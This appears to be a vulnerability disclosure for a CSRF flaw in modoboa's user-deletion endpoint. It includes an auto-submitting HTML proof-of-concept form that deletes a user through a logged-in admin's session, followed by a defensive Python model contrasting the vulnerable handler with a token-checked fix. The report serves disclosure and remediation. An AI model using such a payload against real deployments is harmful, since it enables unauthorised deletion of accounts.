CSRF leading to delete a user in modoboa/modoboa
Jan 18th 2023
The user-deletion functionality is vulnerable to a CSRF attack.
The cause is the same as for the domain-deletion functionality.
Proof of Concept
- Login as admin.
- Create a user to be deleted, e.g. a user with ID 2.
- Open the following file in the browser while logged in as admin.
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/admin/accounts/2/delete/">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
An attacker who gets a logged-in admin to open that page can delete arbitrary users, because the endpoint performs the deletion on a plain GET with no CSRF token check.
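The following is an added, defender-side illustration and is not modoboa's own code: a minimal model of the delete handler showing why the auto-submitted GET form above succeeds, and how requiring POST plus a session-bound synchronizer token rejects it. The `Request` class, the session layout and the sample user table are constructed for this example; `csrfmiddlewaretoken` is only borrowed as Django's conventional form field name.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """Constructed stand-in for a framework request object (modoboa uses Django).
    `session` models the server-side session the browser's cookie resolves to,
    which is exactly what a cross-site auto-submitted form rides on."""
    method: str
    path: str
    session: dict
    form: dict = field(default_factory=dict)


def delete_account_vulnerable(req: Request, user_id: int, users: dict) -> str:
    """Mirrors the reported weakness: being authenticated is the only check, so
    the attacker's page (a plain GET from an unrelated origin) deletes the user."""
    if not req.session.get("is_admin"):
        return "403 forbidden"
    users.pop(user_id, None)
    return "200 deleted"


def issue_csrf_token(session: dict) -> str:
    """Synchronizer token: generated server-side, kept in the session and
    rendered into the legitimate delete form; a cross-site page cannot read it."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def delete_account_hardened(req: Request, user_id: int, users: dict) -> str:
    """Same operation, but a state change needs POST plus a token matching the
    session's. The PoC above fails at the method check; a forged POST without
    the token fails at the constant-time token comparison."""
    if not req.session.get("is_admin"):
        return "403 forbidden"
    if req.method != "POST":
        return "405 method not allowed"
    expected = req.session.get("csrf_token")
    supplied = req.form.get("csrfmiddlewaretoken", "")  # Django's field name
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "403 csrf verification failed"
    users.pop(user_id, None)
    return "200 deleted"


if __name__ == "__main__":
    admin_session = {"is_admin": True}
    forged = Request("GET", "/admin/accounts/2/delete/", admin_session)
    print(delete_account_vulnerable(forged, 2, {2: "victim"}))  # 200 deleted
    print(delete_account_hardened(forged, 2, {2: "victim"}))    # 405 method not allowed
```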